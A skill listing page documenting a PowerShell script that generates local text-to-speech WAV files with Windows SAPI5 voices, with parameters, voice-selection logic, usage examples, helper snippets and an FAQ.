
sapi-ttsl skill


This skill provides lightweight Windows SAPI5 text-to-speech. It prefers Neural voices when they are installed, auto-selects a voice for the requested language, and writes WAV output without using the GPU.

This is most likely a fork of the sapi-ttsr skill from openclaw.
npx playbooks add skill openclaw/skills --skill sapi-ttsl


---
name: sapi-tts
description: Windows SAPI5 text-to-speech with Neural voices. Lightweight alternative to GPU-heavy TTS - zero GPU usage, instant generation. Auto-detects best available voice for your language. Works on Windows 10/11.
---

# SAPI5 TTS (Windows)


Lightweight text-to-speech using Windows built-in SAPI5. Zero GPU, instant generation.

## Installation

Save the script below as `tts.ps1` in your skills folder:

```powershell
<#
.SYNOPSIS
    Windows SAPI5 TTS - Lightweight text-to-speech
.DESCRIPTION
    Uses Windows built-in speech synthesis (SAPI5).
    Works with Neural voices (Win11) or legacy voices (Win10).
    Zero GPU usage, instant generation.
#>

param(
    [Parameter(Mandatory=$false, Position=0)]
    [string]$Text = "",
    
    [Parameter(Mandatory=$false)]
    [Alias("Voice", "v")]
    [string]$VoiceName = "",
    
    [Parameter(Mandatory=$false)]
    [Alias("Lang", "l")]
    [string]$Language = "fr",
    
    [Parameter(Mandatory=$false)]
    [Alias("o")]
    [string]$Output = "",
    
    [Parameter(Mandatory=$false)]
    [Alias("r")]
    [int]$Rate = 0,
    
    [Parameter(Mandatory=$false)]
    [Alias("p")]
    [switch]$Play,
    
    [Parameter(Mandatory=$false)]
    [switch]$ListVoices
)

Add-Type -AssemblyName System.Speech
$synth = New-Object System.Speech.Synthesis.SpeechSynthesizer

$installedVoices = $synth.GetInstalledVoices() | Where-Object { $_.Enabled } | ForEach-Object { $_.VoiceInfo }

if ($ListVoices) {
    Write-Host "`nInstalled SAPI5 voices:`n" -ForegroundColor Cyan
    foreach ($v in $installedVoices) {
        $type = if ($v.Name -match "Online|Neural") { "[Neural]" } else { "[Legacy]" }
        Write-Host "  $($v.Name)" -ForegroundColor White -NoNewline
        Write-Host " $type" -ForegroundColor DarkGray -NoNewline
        Write-Host " - $($v.Culture) $($v.Gender)" -ForegroundColor Gray
    }
    Write-Host ""
    $synth.Dispose()
    exit 0
}

if (-not $Text) {
    Write-Error "Text required. Use: .\tts.ps1 'Your text here'"
    Write-Host "Use -ListVoices to see available voices"
    $synth.Dispose()
    exit 1
}

function Select-BestVoice {
    param($voices, $preferredName, $lang)
    
    if ($preferredName) {
        $match = $voices | Where-Object { $_.Name -like "*$preferredName*" } | Select-Object -First 1
        if ($match) { return $match }
        Write-Warning "Voice '$preferredName' not found, auto-selecting..."
    }
    
    $cultureMap = @{
        "fr" = "fr-FR"; "french" = "fr-FR"
        "en" = "en-US"; "english" = "en-US"
        "de" = "de-DE"; "german" = "de-DE"
        "es" = "es-ES"; "spanish" = "es-ES"
        "it" = "it-IT"; "italian" = "it-IT"
    }
    $targetCulture = $cultureMap[$lang.ToLower()]
    if (-not $targetCulture) { $targetCulture = $lang }
    
    $neuralMatch = $voices | Where-Object { 
        $_.Name -match "Online|Neural" -and $_.Culture.Name -eq $targetCulture 
    } | Select-Object -First 1
    if ($neuralMatch) { return $neuralMatch }
    
    $langMatch = $voices | Where-Object { $_.Culture.Name -eq $targetCulture } | Select-Object -First 1
    if ($langMatch) { return $langMatch }
    
    $anyNeural = $voices | Where-Object { $_.Name -match "Online|Neural" } | Select-Object -First 1
    if ($anyNeural) { return $anyNeural }
    
    return $voices | Select-Object -First 1
}

$selectedVoice = Select-BestVoice -voices $installedVoices -preferredName $VoiceName -lang $Language

if (-not $selectedVoice) {
    Write-Error "No SAPI5 voices found! Install voices in Windows Settings > Time & Language > Speech"
    $synth.Dispose()
    exit 1
}

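if (-not $Output) {
    $ttsDir = "$env:USERPROFILE\.openclaw\workspace\tts"
    if (-not (Test-Path $ttsDir)) { New-Item -ItemType Directory -Path $ttsDir -Force | Out-Null }
    $timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
    $Output = "$ttsDir\sapi_$timestamp.wav"
} else {
    # Resolve relative paths against the PowerShell location.
    # .NET APIs use the process working directory, and [Uri] rejects relative paths.
    $Output = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($Output)
}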

try {
    $synth.SelectVoice($selectedVoice.Name)
    $synth.Rate = $Rate
    $synth.SetOutputToWaveFile($Output)
    $synth.Speak($Text)
    $synth.SetOutputToNull()
    
    Write-Host "Voice: $($selectedVoice.Name) [$($selectedVoice.Culture)]" -ForegroundColor Cyan
    Write-Host "MEDIA:$Output"
    
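    # Auto-play if requested (uses the WPF MediaPlayer from PresentationCore, no external player)
    if ($Play) {
        Add-Type -AssemblyName PresentationCore
        $player = New-Object System.Windows.Media.MediaPlayer
        $player.Open([Uri]$Output)
        $player.Play()
        # NaturalDuration.TimeSpan is only readable once the media has loaded; wait up to ~5 s
        $waited = 0
        while (-not $player.NaturalDuration.HasTimeSpan -and $waited -lt 5000) {
            Start-Sleep -Milliseconds 100
            $waited += 100
        }
        # Block until playback reaches the end of the clip
        while ($player.NaturalDuration.HasTimeSpan -and $player.Position -lt $player.NaturalDuration.TimeSpan) {
            Start-Sleep -Milliseconds 100
        }
        $player.Close()
    }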
    
} catch {
    Write-Error "TTS failed: $($_.Exception.Message)"
    exit 1
} finally {
    $synth.Dispose()
}
```

## Quick Start

```powershell
# Generate audio file
.\tts.ps1 "Bonjour, comment vas-tu ?"

# Generate AND play immediately
.\tts.ps1 "Bonjour !" -Play
```

## Parameters

| Parameter | Alias | Default | Description |
|-----------|-------|---------|-------------|
| `-Text` | (positional) | required | Text to speak |
| `-VoiceName` | `-Voice`, `-v` | auto | Voice name (partial match OK) |
| `-Language` | `-Lang`, `-l` | fr | Language: fr, en, de, es, it, or a full culture name such as en-GB |
| `-Output` | `-o` | auto | Output WAV file path |
| `-Rate` | `-r` | 0 | Speed: -10 (slow) to +10 (fast) |
| `-Play` | `-p` | false | Play audio immediately after generation |
| `-ListVoices` | | | Show installed voices |

## Examples

```powershell
# French with auto-play
.\tts.ps1 "Bonjour !" -Lang fr -Play

# English, faster
.\tts.ps1 "Hello there!" -Lang en -Rate 2 -Play

# Specific voice
.\tts.ps1 "Salut !" -Voice "Denise" -Play

# List available voices
.\tts.ps1 -ListVoices
```
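
On success the script prints a `MEDIA:<path>` line with the generated file's location. A calling script may want that path. The sketch below shows one way to extract it; `Get-MediaPath` is a hypothetical helper that is not part of `tts.ps1`, and the sample path is made up.

```powershell
# Hypothetical helper (not part of tts.ps1): pull the WAV path out of the
# "MEDIA:<path>" line that the script prints after a successful run.
function Get-MediaPath {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        if ($line -match '^MEDIA:(.+)$') {
            return $Matches[1].Trim()
        }
    }
    return $null   # no MEDIA line found
}

# Sample output in the shape the script prints (the path is invented).
$sample = @(
    'Voice: Microsoft Hortense Desktop [fr-FR]'
    'MEDIA:C:\Users\me\.openclaw\workspace\tts\sapi_20240101_120000.wav'
)
$wavPath = Get-MediaPath -Lines $sample
```

The script prints with `Write-Host`, which in PowerShell 5 and later writes to the information stream. To capture real output, redirect that stream, for example `.\tts.ps1 "Hello" -Lang en 6>&1 | ForEach-Object { "$_" }`, and pass the resulting lines to the helper.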

## Installing Neural Voices (Recommended)

Neural voices sound much better than legacy Desktop voices.

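### Windows 11
Neural voices ship with Windows 11. Manage them under:
**Settings → Time & Language → Speech → Manage voices**

If `-ListVoices` does not show them, they may not be registered for SAPI5; the adapter described in the next section can expose them.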

### Windows 10/11 (More voices)
For additional Neural voices (like French Denise):

1. Install [NaturalVoiceSAPIAdapter](https://github.com/gexgd0419/NaturalVoiceSAPIAdapter)
2. Download voices in **Settings → Time & Language → Speech**
3. Run `-ListVoices` to verify

## Performance

- **Generation:** Near-instant (< 1 second for short text)
- **GPU:** None
- **CPU:** Minimal
- **Quality:** Good (Neural) / Basic (Legacy)

## Credits

Made by Pocus 🎩 — AI assistant, with Olive (@Korddie).

Overview

This skill provides Windows SAPI5 text-to-speech using built-in Neural and legacy voices as a lightweight alternative to GPU-heavy TTS. It generates WAV files near-instantly with zero GPU usage and auto-selects the best available voice for the requested language. It works on Windows 10 and 11 and supports playback, voice listing, and rate control.

How this skill works

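The script uses the System.Speech.Synthesis API to enumerate the installed, enabled SAPI5 voices. If a voice name is given, the first voice whose name contains it wins. Otherwise the script tries, in order: a Neural (Online) voice for the requested culture, any voice for that culture, any Neural voice, and finally the first installed voice. It writes output to a WAV file (auto-generated or user-specified path) and can optionally play the audio via the .NET MediaPlayer. Language selection uses a simple language-to-culture map for common languages (fr, en, de, es, it); any other value is treated as a culture name.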
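
The selection order can be sketched on plain data. This is a simplified restatement and not the script's own function: `Select-VoiceSketch` is a hypothetical name, the voice records are made-up stand-ins for `VoiceInfo` objects, and `Culture` is a plain string here where the real script compares `Culture.Name`.

```powershell
# Simplified restatement of the fallback order, run against made-up records.
function Select-VoiceSketch {
    param([object[]]$Voices, [string]$PreferredName = '', [string]$Culture = 'fr-FR')

    # Build candidates from highest to lowest priority; the first one wins.
    $candidates = @()
    if ($PreferredName) {
        $candidates += @($Voices | Where-Object { $_.Name -like "*$PreferredName*" })
    }
    $candidates += @($Voices | Where-Object { $_.Name -match 'Online|Neural' -and $_.Culture -eq $Culture })
    $candidates += @($Voices | Where-Object { $_.Culture -eq $Culture })
    $candidates += @($Voices | Where-Object { $_.Name -match 'Online|Neural' })
    $candidates += @($Voices)
    return $candidates | Select-Object -First 1
}

# Sample records for illustration only.
$voices = @(
    [pscustomobject]@{ Name = 'Microsoft David Desktop';           Culture = 'en-US' }
    [pscustomobject]@{ Name = 'Microsoft Hortense Desktop';        Culture = 'fr-FR' }
    [pscustomobject]@{ Name = 'Microsoft Denise Online (Natural)'; Culture = 'fr-FR' }
)

$french  = Select-VoiceSketch -Voices $voices -Culture 'fr-FR'    # Neural voice for the culture
$english = Select-VoiceSketch -Voices $voices -Culture 'en-US'    # legacy voice for the culture
$german  = Select-VoiceSketch -Voices $voices -Culture 'de-DE'    # no match: falls back to any Neural voice
$named   = Select-VoiceSketch -Voices $voices -PreferredName 'Hortense' -Culture 'en-US'
```

An explicit name takes precedence over the language, so `$named` is the French Hortense voice even though `en-US` was requested.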

When to use it

  • You need instant, low-resource TTS without a GPU.
  • You want to generate short speech clips or notifications on Windows 10/11.
  • You prefer using built-in Windows voices, including Windows 11 Neural voices.
  • You need a scriptable CLI tool for automating TTS in workflows.
  • You want to quickly check available SAPI5 voices on a machine.

Best practices

  • Run -ListVoices first to see installed voices and Neural availability.
  • Specify -Language for better automatic voice selection when you don’t know voice names.
  • Provide a partial or exact -VoiceName to force a specific voice if needed.
  • Use the -Play flag for quick QA during development; rely on saved WAV files for production.
  • Install additional voices via Windows Settings or NaturalVoiceSAPIAdapter for more high-quality Neural options.

Example use cases

  • Generate spoken prompts for desktop assistants or chatbots without cloud dependencies.
  • Create notification audio files for monitoring or alert systems on Windows servers.
  • Produce short voice clips for demos, tutorials, or accessibility features.
  • Batch-generate TTS files in automated scripts or scheduled tasks.
  • Verify and list installed SAPI5 voices on a machine for troubleshooting and setup.
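
For the batch case, one possible approach is to pair each text with a numbered output path and then call the script once per pair. The sketch below is illustrative: `New-TtsJobList`, the `clip_NNN.wav` naming scheme, and the `tts-batch` folder are assumptions, and the call to `tts.ps1` is left commented out so the snippet runs anywhere.

```powershell
# Hypothetical helper: pair each text with a numbered WAV path.
function New-TtsJobList {
    param([string[]]$Texts, [string]$OutDir)
    $i = 0
    foreach ($t in $Texts) {
        $i++
        [pscustomobject]@{
            Text   = $t
            Output = Join-Path $OutDir ('clip_{0:d3}.wav' -f $i)
        }
    }
}

# Illustrative output folder under the temp directory.
$outDir = Join-Path ([System.IO.Path]::GetTempPath()) 'tts-batch'
$jobs = @(New-TtsJobList -Texts 'Disk almost full', 'Backup finished' -OutDir $outDir)

foreach ($job in $jobs) {
    # On a Windows machine with tts.ps1 in the current folder, uncomment:
    # .\tts.ps1 $job.Text -Lang en -Output $job.Output
    '{0} -> {1}' -f $job.Text, $job.Output
}
```

Passing an explicit `-Output` per clip avoids relying on the default timestamped file name, which has one-second resolution and could collide when several clips are generated in quick succession.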

FAQ

Which Windows versions are supported?

Windows 10 and Windows 11. Neural voices are built-in on Windows 11; Windows 10 can use added voices via adapters or downloads.

How do I get higher-quality voices?

Use Windows 11 Neural voices or install extra voices via Settings → Time & Language → Speech. NaturalVoiceSAPIAdapter can provide additional Neural voice options on some setups.

Can I control speech speed?

Yes. Use -Rate with values from -10 (slow) to +10 (fast).
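
The underlying `SpeechSynthesizer.Rate` property only accepts values from -10 to 10. When the rate comes from user input or a config file, a caller may want to clamp it first. A minimal sketch, where `Limit-SpeechRate` is a hypothetical helper and not part of the skill:

```powershell
# Hypothetical helper: clamp a requested rate into the -10..10 range.
function Limit-SpeechRate {
    param([int]$Rate)
    return [Math]::Max(-10, [Math]::Min(10, $Rate))
}

$tooFast = Limit-SpeechRate -Rate 15    # clamped to the upper bound
$tooSlow = Limit-SpeechRate -Rate -42   # clamped to the lower bound
$normal  = Limit-SpeechRate -Rate 2     # already in range, unchanged
```

The clamped value can then be passed to the script, for example `.\tts.ps1 "Hello" -Lang en -Rate $tooFast`.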

Does this use GPU or cloud services?

No. It runs locally with zero GPU usage and does not call cloud TTS services.